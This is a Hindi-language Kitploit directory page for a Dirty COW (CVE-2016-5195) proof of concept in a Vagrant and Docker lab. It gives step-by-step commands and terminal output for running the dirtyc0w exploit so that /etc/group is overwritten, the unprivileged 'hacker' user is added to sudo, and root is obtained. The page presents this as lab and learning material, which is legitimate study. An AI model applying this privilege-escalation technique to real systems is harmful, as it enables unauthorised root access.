Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Dirty-COW-CVE-2016-5195- — रूट के रूप में लॉगिन करने के लिए dirtycow भेद्यता का शोषण करें | Kitploit
उपकरण/GitHubGitHub/zakariamaaraki/dirty-cow-cve-2016-5195-
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणलर्निंग और शिक्षाकंटेनर एस्केपलैब और अभ्यास
GitHubzakariamaaraki/dirty-cow-cve-2016-5195-

Dirty-COW-CVE-2016-5195-

रूट के रूप में लॉगिन करने के लिए dirtycow भेद्यता का शोषण करें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
255 साल पहलेअभी तक समीक्षित नहीं

Dirtyc0w Docker POC

आवश्यक शर्तें:

  • Vagrant स्थापित

उपयोग कैसे करें

पहले प्रोजेक्ट को क्लोन करें git clone https://github.com/BrolyCode/Dirty-Cow.git फ़ोल्डर में जाएं cd Dirty-Cow फिर कमांड से वातावरण चलाएं

root@kitploit:~
vagrant up

सर्वर बनने के बाद, हम उसमें ssh करेंगे

root@kitploit:~
vagrant ssh

रूट उपयोगकर्ता में बदलें

root@kitploit:~
sudo -i

अब हम हैकर के रूप में लॉग इन कर सकते हैं

root@kitploit:~
docker exec -it -u hacker nginx bash

जिस डायरेक्टरी में हम लॉग इन हैं, उसमें निम्नलिखित फ़ाइलें हैं

root@kitploit:~
drwxrwxrwt  2 root root  4096 Nov  26 11:10 .
drwxr-xr-x 41 root root  4096 Nov  26 11:10 ..
-rwxr-xr-x  1 root root  9880 Nov  26 04:52 dirtyc0w
-rwxrwxrwx  1 root root  9880 Nov  26 04:52 dirtyc0w.c

अगर हम फ़ाइल /etc/group को cat करें तो हम देखते हैं

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
....

हम रूट के रूप में लॉगिन करने का प्रयास कर सकते हैं

root@kitploit:~
sudo -i

लेकिन सिस्टम मना करेगा, क्योंकि हमारे पास पहुंच का अधिकार नहीं है। अब हम /etc/group पर विफलता का शोषण करेंगे

root@kitploit:~
./dirtyc0w 

यह टर्मिनल पर निम्नलिखित प्रिंट करेगा, हमें थोड़ा समय (2/3 मिनट) इंतजार करना होगा।

root@kitploit:~
mmap 7fd0facf4000

madvise 0

procselfmem 1500000000

फिर हम फिर से /etc/group को cat करेंगे

root@kitploit:~
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:hacker
...

रूट के रूप में लॉगिन करें

root@kitploit:~
sudo -i

root@27862a2f9973:~#

सफाई

अपने होस्ट मशीन के टर्मिनल पर वापस जाएं और vagrant destroy कमांड दें

टूल डाउनलोड करें